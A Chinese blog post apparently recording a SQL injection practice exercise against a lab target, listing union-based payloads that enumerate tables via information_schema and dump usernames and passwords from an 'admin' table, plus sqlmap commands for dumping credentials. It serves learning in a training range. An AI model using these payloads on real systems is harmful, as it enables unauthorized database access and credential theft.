SQL注入案例

代码熬夜敲Q2023-09-07 20:34

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码

一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
鬼蛟2 分钟前
Redis
数据库·redis·缓存
IP老炮不瞎唠9 分钟前
Scrapy 高效采集:优化方案与指南
网络·爬虫·python·scrapy·安全
Ricky_Theseus24 分钟前
SPOOLING 系统详解
linux·服务器·数据库
zmj32032426 分钟前
UNR -155 Annex 5提示的威胁及其编号
网络·安全·网络安全
HUGu RGIN26 分钟前
Redis 下载与安装 教程 windows版
数据库·windows·redis
jaysee-sjc27 分钟前
【项目三】用GUI编程实现局域网群聊软件
java·开发语言·算法·安全·intellij-idea
卢光庆28 分钟前
aardio - wsock.tcp.simpleHttpServer 访问数据库例程
数据库
木心术129 分钟前
OpenClaw数据库自动化部署与网站接口调通全流程指南
运维·数据库·自动化
枕布响丸辣35 分钟前
MySQL 主从复制与 MyCat 分库分表实战详解
数据库·mysql
eRTE XFUN37 分钟前
Redis 设置密码(配置文件、docker容器、命令行3种场景)
数据库·redis·docker
热门推荐
012026年3月AI领域大事件:DeepSeek引领开源风暴02GitHub 镜像站点03围棋-html版本04纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程07Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)08UV安装并设置国内源09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)